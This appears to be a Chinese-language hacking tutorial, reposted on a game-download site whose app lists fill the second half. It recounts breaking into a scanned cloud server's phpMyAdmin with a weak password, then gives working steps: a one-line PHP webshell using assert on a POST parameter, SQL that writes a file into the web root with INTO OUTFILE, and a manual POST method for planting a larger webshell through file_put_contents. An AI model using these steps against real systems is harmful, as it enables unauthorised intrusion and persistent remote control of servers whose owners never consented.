木马GetShell的另类姿势
扫描二维码随身看资讯
使用手机 二维码应用 扫描右侧二维码,您可以
1. 在手机上细细品读~
2. 分享给您的微信好友或朋友圈~
扫C段时发现一机器有phpMyAdmin服务,小编就尝试了一下弱口令,root123果断进入,然后就开始了接下来的一大串资讯内容。
探测IP为某云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:
一句话木马原形:
assert($_POST[-7]);
写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):
use test;
drop table if exists temp;
create table temp (cmd text NOT NULL);
insert into temp (cmd) values(" ");
select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';
drop table if exists temp;
0×02 处理大马
用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。
这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。
首先在本地把大马处理好以便于作为post参数:
用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。
C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):
strip.php:
<!--?php
echo php_strip_whitespace('strip_shell.php');
?-->
urlencode.php:
<!--?php
echo urlencode(file_get_contents('urlencode_shell.php'));
?-->
执行过程如下(注意文件名称变化和执行顺序):
最后就要用到Advanced REST client插件
这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容"));
POST表单
天天绕圈圈游戏 1.2.5 安卓版
加查海关与咖啡游戏 1.1.0 安卓版
大吉普越野驾驶游戏 1.0.4 安卓版
沙盒星球建造游戏 1.5.0 安卓版
秘堡埃德兰Elderand游戏 1.3.8 安卓版
地铁跑酷暗红双旦版 3.5.0 安卓版
跨越奔跑大师游戏 0.1 安卓版
Robot Warfare手机版 0.4.1 安卓版
地铁跑酷playmods版 3.18.2 安卓版
我想成为影之强者游戏 1.11.1 官方版
gachalife2最新版 0.92 安卓版
航梦游戏编辑器最新版 1.0.6.8 安卓版
喵星人入侵者游戏 1.0 安卓版
地铁跑酷黑白水下城魔改版本 3.9.0 安卓版
- 1
芭比公主宠物城堡游戏 1.9 安卓版
- 2
地铁跑酷忘忧10.0原神启动 安卓版
- 3
死神之影2游戏 0.42.0 安卓版
- 4
跨越奔跑大师游戏 0.1 安卓版
- 5
挂机小铁匠游戏 122 安卓版
- 6
烤鱼大师小游戏 1.0.0 手机版
- 7
咸鱼大翻身游戏 1.18397 安卓版
- 8
灵魂潮汐手游 0.45.3 安卓版
- 9
旋转陀螺多人对战游戏 1.3.1 安卓版
- 10
Escapist游戏 1.1 安卓版
- 1
开心消消乐赚钱版下载
- 2
Minecraft我的世界基岩版正版免费下载
- 3
暴力沙盒仇恨最新版2023
- 4
疯狂扯丝袜
- 5
黑暗密语2内置作弊菜单 1.0.0 安卓版
- 6
爆笑虫子大冒险内购版
- 7
姚记捕鱼
- 8
班班幼儿园手机版
- 9
秘密邻居中文版
- 10
千炮狂鲨